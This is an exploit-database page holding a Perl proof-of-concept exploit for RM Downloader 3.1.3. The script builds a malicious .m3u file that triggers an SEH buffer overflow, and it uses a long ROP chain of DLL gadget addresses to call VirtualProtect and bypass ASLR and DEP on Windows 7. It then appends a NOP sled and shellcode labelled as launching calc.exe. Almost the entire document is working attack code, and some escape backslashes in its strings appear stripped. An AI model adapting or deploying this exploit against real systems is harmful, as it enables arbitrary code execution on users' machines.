[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RM Downloader 3.1.3 Local SEH Exploit (Win7 ASLR and DEP Bypass)
# Published : 2010-07-01
# Author : Node
# Previous Title : Mediacoder v0.7.3.4682 Universal Buffer Overflow (SEH)
# Next Title : Serenity Audio Player 3.2.3 (SEH) Buffer Overflow
#!/usr/bin/perl
# Exploit Title: RM Downloader 3.1.3 Local SEH Exploit (Win7 ASLR and DEP Bypass)
# Date: July 1, 2010
# Author: Node
# Software Link: http://www.mini-stream.net/downloads/RMDownloader.exe
# Version: RM Downloader 3.1.3.3.2010.06.26 (Evaluation)
# Tested on: Windows 7 Ultimate x64 ENG
# Notes: Only using rop gadgets from RDfilter03.dll (432KB).
# Using exploit from MadjiX and inspiration from corelanc0d3r.
# Code :
my $header = "#EXTM3Un";
my $pre = "A" x 16240;
my $rop = pack('V',0x10048875); # PUSH ESP # MOV EAX,1 # POP EBX # ADD ESP,8
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x10023405); # ADD ESP,20
$rop = $rop."1111"; # VirtualProtect() placeholder
$rop = $rop."2222"; #return address placeholder
$rop = $rop."3333"; #lpAddress placeholder
$rop = $rop."4444"; #dwsize placeholder
$rop = $rop."5555"; #flNewProtect placeholder
$rop = $rop.pack('V',0x10051005); # lpflOldProtect writable address
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x10012701); # POP EBX # POP ECX
$rop = $rop."A" x 4;
$rop = $rop.pack('V',0xffffffff);
$rop = $rop.pack('V',0x10040674); # PUSH EAX # POP ESI # POP EBP # MOV EAX,DWORD PTR DS:[ECX+EAX+2] # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001229B); # PUSH ESI # ADD AL,5E # POP EBX
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1002CF10) x 11; # ADD EAX,80BF(32959) # ADD DH,DH
$rop = $rop.pack('V',0x100422FB) x 272; # ADD EAX,20
$rop = $rop.pack('V',0x10016DA7) x 7; # INC EAX
$rop = $rop.pack('V',0x10028069); # MOV EAX,DWORD PTR DS:[EAX]
$rop = $rop.pack('V',0x10046F47) x 395; # DEC EAX
$rop = $rop.pack('V',0x1002CCD7) x 12; # INC ESI # ADD AL,3
$rop = $rop.pack('V',0x10037288) x 12; # SUB AL,3
$rop = $rop.pack('V',0x1001C707); # ADD ESP,8 # MOV DWORD PTR DS:[ESI],EAX # MOV EAX,ESI # POP ESI
$rop = $rop."A" x 12;
$rop = $rop.pack('V',0x10040674); # PUSH EAX # POP ESI # POP EBP # MOV EAX,DWORD PTR DS:[ECX+EAX+2] # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001229B); # PUSH ESI # ADD AL,5E # POP EBX
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1002CF10); # ADD EAX,80BF(32959) # ADD DH,DH
$rop = $rop.pack('V',0x1002CCD7) x 4; # INC ESI # ADD AL,3
$rop = $rop.pack('V',0x10037288) x 4; # SUB AL,3
$rop = $rop.pack('V',0x1001C707); # ADD ESP,8 # MOV DWORD PTR DS:[ESI],EAX # MOV EAX,ESI # POP ESI
$rop = $rop."A" x 12;
$rop = $rop.pack('V',0x10040674); # PUSH EAX # POP ESI # POP EBP # MOV EAX,DWORD PTR DS:[ECX+EAX+2] # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001229B); # PUSH ESI # ADD AL,5E # POP EBX
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1002CF10); # ADD EAX,80BF(32959) # ADD DH,DH
$rop = $rop.pack('V',0x1002CCD7) x 4; # INC ESI # ADD AL,3
$rop = $rop.pack('V',0x10037288) x 4; # SUB AL,3
$rop = $rop.pack('V',0x1001C707); # ADD ESP,8 # MOV DWORD PTR DS:[ESI],EAX # MOV EAX,ESI # POP ESI
$rop = $rop."A" x 12;
$rop = $rop.pack('V',0x10040674); # PUSH EAX # POP ESI # POP EBP # MOV EAX,DWORD PTR DS:[ECX+EAX+2] # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001229B); # PUSH ESI # ADD AL,5E # POP EBX
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001011B); # XOR EAX,EAX
$rop = $rop.pack('V',0x10031DAC); # ADD EAX,100 # POP EBP
$rop = $rop."A" x 4;
$rop = $rop.pack('V',0x10031DAC); # ADD EAX,100 # POP EBP
$rop = $rop."A" x 4;
$rop = $rop.pack('V',0x10031DAC); # ADD EAX,100 # POP EBP
$rop = $rop."A" x 4;
$rop = $rop.pack('V',0x1002CCD7) x 4; # INC ESI # ADD AL,3
$rop = $rop.pack('V',0x10037288) x 4; # SUB AL,3
$rop = $rop.pack('V',0x1001C707); # ADD ESP,8 # MOV DWORD PTR DS:[ESI],EAX # MOV EAX,ESI # POP ESI
$rop = $rop."A" x 12;
$rop = $rop.pack('V',0x10040674); # PUSH EAX # POP ESI # POP EBP # MOV EAX,DWORD PTR DS:[ECX+EAX+2] # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001229B); # PUSH ESI # ADD AL,5E # POP EBX
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001011B); # XOR EAX,EAX
$rop = $rop.pack('V',0x100422FB) x 2; # ADD EAX,20
$rop = $rop.pack('V',0x1002CCD7) x 4; # INC ESI # ADD AL,3
$rop = $rop.pack('V',0x10037288) x 4; # SUB AL,3
$rop = $rop.pack('V',0x1001C707); # ADD ESP,8 # MOV DWORD PTR DS:[ESI],EAX # MOV EAX,ESI # POP ESI
$rop = $rop."A" x 12;
$rop = $rop.pack('V',0x10046F47) x 16; # DEC EAX
$rop = $rop.pack('V',0x1002FF96); # XCHG EAX,ESP
my $space= "A" x (43492 - length($pre) - length($rop));
my $seh=pack('V',0x10017928); #ADD ESP,4404
my $nops = "x90" x 5732;
my $shellcode =
"xb8x7bx39xebx12x29xc9xb1x33xd9xe1xd9x74x24" .
"xf4x5bx31x43x0fx83xebxfcx03x43x70xdbx1exee" .
"x6ex92xe1x0fx6exc5x68xeax5fxd7x0fx7excdxe7" .
"x44xd2xfdx8cx09xc7x76xe0x85xe8x3fx4fxf0xc7" .
"xc0x61x3cx8bx02xe3xc0xd6x56xc3xf9x18xabx02" .
"x3dx44x43x56x96x02xf1x47x93x57xc9x66x73xdc" .
"x71x11xf6x23x05xabxf9x73xb5xa0xb2x6bxbexef" .
"x62x8dx13xecx5fxc4x18xc7x14xd7xc8x19xd4xe9" .
"x34xf5xebxc5xb9x07x2bxe1x21x72x47x11xdcx85" .
"x9cx6bx3ax03x01xcbxc9xb3xe1xedx1ex25x61xe1" .
"xebx21x2dxe6xeaxe6x45x12x67x09x8ax92x33x2e" .
"x0exfexe0x4fx17x5ax47x6fx47x02x38xd5x03xa1" .
"x2dx6fx4exacxb0xfdxf4x89xb2xfdxf6xb9xdaxcc" .
"x7dx56x9dxd0x57x12x51x9bxfax33xf9x42x6fx06" .
"x64x75x45x45x90xf6x6cx36x67xe6x04x33x2cxa0" .
"xf5x49x3dx45xfaxfex3ex4cx99x61xacx0cx70x07" .
"x54xb6x8cxcd"; #Calc.exe
my $end= "x90" x (20000 - $nops);
open(MYFILE,'>>RMdownloader.m3u');
print MYFILE $header.$pre.$rop.$space.$seh.$nops.$shellcode.$end;
close(MYFILE);